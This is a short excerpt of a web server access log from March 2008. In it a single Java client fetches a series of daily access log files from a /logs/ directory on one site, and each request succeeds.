216.106.188.114 - - [16/Mar/2008:05:48:05 -0700] "GET /logs/access_070626.log HTTP/1.1" 200 32190 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:06 -0700] "GET /logs/access_070627.log HTTP/1.1" 200 163174 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:16 -0700] "GET /logs/access_070628.log HTTP/1.1" 200 28980 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:18 -0700] "GET /logs/access_070629.log HTTP/1.1" 200 29210 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:19 -0700] "GET /logs/access_070630.log HTTP/1.1" 200 36187 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:20 -0700] "GET /logs/access_070701.log HTTP/1.1" 200 48497 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:24 -0700] "GET /logs/access_070702.log HTTP/1.1" 200 2893 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:25 -0700] "GET /logs/access_070703.log HTTP/1.1" 200 22875 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:26 -0700] "GET /logs/access_070704.log HTTP/1.1" 200 11515 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:26 -0700] "GET /logs/access_070705.log HTTP/1.1" 200 50888 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:29 -0700] "GET /logs/access_070706.log HTTP/1.1" 200 26632 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:30 -0700] "GET /logs/access_070707.log HTTP/1.1" 200 48967 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:31 -0700] "GET /logs/access_070708.log HTTP/1.1" 200 169855 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:35 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 30963 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:36 -0700] "GET /logs/access_070710.log HTTP/1.1" 200 32027 "-" "Java/1.4.1_04" "dmulk.com"
